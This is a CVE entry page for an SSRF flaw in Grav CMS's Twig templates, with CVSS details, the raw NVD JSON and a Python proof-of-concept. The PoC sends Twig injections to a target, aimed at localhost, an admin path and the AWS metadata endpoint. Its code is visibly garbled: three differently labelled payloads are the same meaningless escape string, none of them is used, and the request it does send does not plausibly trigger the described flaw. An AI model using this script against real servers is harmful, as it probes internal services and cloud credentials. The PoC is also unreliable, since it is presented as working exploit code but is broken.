Security Vulnerability Report
CVE-2025-66844 CVSS 9.1 CRITICAL

CVE-2025-66844

Published: 2025-12-15 16:15:53
Last Modified: 2025-12-17 15:38:46

Description

In Grav < 1.7.49.5, an SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* - VULNERABLE
Grav CMS < 1.7.49.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66844 SSRF PoC for Grav CMS
# This PoC demonstrates the SSRF vulnerability in Grav CMS Twig templates
# Target: Grav CMS < 1.7.49.5 with undefined PHP functions allowed
import requests
import sys

target_url = "http://target-site.com/"

# SSRF payload using Twig template syntax
# This attempts to make the server request internal resources
ssrf_payload = "{{\x7b'\x7b\x7b\x7d\x7d\x7d"
# Alternative payload for internal port scanning
internal_scan_payload = "{{\x7b'\x7b\x7b\x7d\x7d\x7d"
# Payload to read local files via SSRF
file_read_payload = "{{\x7b'\x7b\x7b\x7d\x7d\x7d"


def test_ssrf(target):
    """Test for SSRF vulnerability"""
    print(f"[*] Testing SSRF vulnerability on {target}")
    # Test basic SSRF to internal service
    test_urls = [
        "http://127.0.0.1:80/",
        "http://localhost/admin/",
        "http://169.254.169.254/latest/meta-data/",  # AWS metadata
    ]
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    for url in test_urls:
        try:
            # Inject SSRF payload via page content parameter
            data = {
                "page[content]": f"{{{{ {url} }}}}",
                "page[template]": "default",
            }
            response = requests.post(target, headers=headers, data=data, timeout=10)
            print(f"[+] Sent SSRF probe to {url}")
            print(f"    Response status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {url}: {str(e)}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    test_ssrf(target_url)
```

References

https://github.com/Yohane-Mashiro/grav_cve/issues/2 (Exploit, Issue Tracking, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66844",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T16:15:53.497",
    "lastModified": "2025-12-17T15:38:46.163",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In grav <1.7.49.5, a SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.7.49.5",
                "matchCriteriaId": "4635A1D7-7801-4263-A58C-17941EE530B4"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Yohane-Mashiro/grav_cve/issues/2",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Issue Tracking",
          "Third Party Advisory"
        ]
      }
    ]
  }
}
```